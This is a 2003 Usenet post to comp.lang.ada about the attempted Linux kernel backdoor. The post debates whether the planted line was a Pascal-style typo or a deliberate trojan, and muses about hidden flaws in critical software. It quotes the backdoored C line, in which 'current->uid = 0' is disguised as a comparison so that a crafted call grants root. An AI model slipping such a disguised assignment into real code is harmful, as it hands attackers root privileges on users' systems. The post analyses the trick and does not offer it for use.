From mboxrd@z Thu Jan 1 00:00:00 1970 X-Spam-Checker-Version: SpamAssassin 3.4.4 (2020-01-24) on polar.synack.me X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,FREEMAIL_FROM autolearn=ham autolearn_force=no version=3.4.4 X-Google-Language: ENGLISH,ASCII-7-bit X-Google-Thread: 103376,71171f53c22d92b5 X-Google-Attributes: gid103376,public X-Google-ArrivalTime: 2003-11-16 03:29:44 PST Path: archiver1.google.com!postnews1.google.com!not-for-mail From: dmytrylavrov@fsmail.net (Dmytry Lavrov) Newsgroups: comp.lang.ada Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel Date: 16 Nov 2003 03:29:44 -0800 Organization: http://groups.google.com Message-ID: <49cbf610.0311160329.3e319ba4@posting.google.com> References: <3FB1A63C.9080200@nowhere.com> <8Eisb.14119$hB5.9208@nwrdny02.gnilink.net> <3FB1F484.50705@nowhere.com> <3FB44C78.5050501@nowhere.com> <49cbf610.0311140300.26945e00@posting.google.com> <3FB5B35E.7060900@nowhere.com> NNTP-Posting-Host: 213.248.15.37 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Trace: posting.google.com 1068982184 21002 127.0.0.1 (16 Nov 2003 11:29:44 GMT) X-Complaints-To: groups-abuse@google.com NNTP-Posting-Date: Sun, 16 Nov 2003 11:29:44 +0000 (UTC) Xref: archiver1.google.com comp.lang.ada:2538 Date: 2003-11-16T03:29:44-08:00 List-Id: Adrian Hoe wrote in message news:<3FB5B35E.7060900@nowhere.com>... > On second thought, this is a great example for my Ada Seminar. I shall > include it into the slides. On my second: i have readed somewhere on that web links,that it's "surely very smart hacker": "he also added extra () to avoid warnings..." ;-) I can write in pascal/ada: if (options=__WCLONE or __WALL)and(current.uid=0) then something ,that () are really needed because "and" have bigger priority than "=" so it's why i said about pascal background:it's very possible to be typo,everyone with pascal background working in C many times maked such mistakes,avoiding all warnings ;-)! And i think after spending days/weeks, foget that nightmare is quite hard.(anyway,somehow i newer maked that bug yet,only because i know that mistake) Or it's hacker with pascal background ,or he know someone with pascal background and that mistakes,in any case somehow he know that common pascal-->c typo and was able to insert it. Or it's really typo that someone wasn't removed,just because it's so cool,saying for himself:it's test if they check code...it's only test... ;-) . (Raskolnikov,blin ;-) They also truing to put that it's someone hacked CVS and added it into code. IMO quite inprobable.;-)if so,that hacker was able to put it into old code,avoiding problems with reviews,and it's also possible to hack all main CVS'es avoiding problems with updates, if you can hack one CVS,you can hack all. I really worry now,almost all commercial code probably contain such cool things...including safety critical c code in airplanes...nuclair plants...almost everyone,not only with pascal background, can make that typo,find it,and then not remove because it's too cool... ....just for tesst,jussst for tessst,my beauty...ssss.... ...and then it's too late to show it... ....good idea: that mistake as ring in "Lord of the Ring".... Regards, Dmytry Lavrov. p.s. if it's hacker,probably there's should be other bugs left to use that trojan, some bugs(buffer overflow) allows remote user to execute his code,but non-root.Else that trojan don't make impact on,for example,me. It's only bad for website hosting servers,if you have account,and for other multiuser systems.Why he need to hack multi-user systems...don't know why he may need that. So if it's hacker,at least 1/2 or more probablity that one other trojan left unnoticed( not in kernel,in netscape or other internet prog...like Morriss'days bug ). More nice typos with *.... > > Dmytry Lavrov wrote: > > >>>>+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) > >>>>+ retval = -EINVAL; > >>>> > > > > Hahaha......(falling ,and still laughing!) > > > > So cool! > > > > anyway, 0==something looks like complete idiotism for me,perhaps for > > that guy too ;-))).Someone with Pascal background,or hacker or it's > > simply typo,or all together ;-)))) > >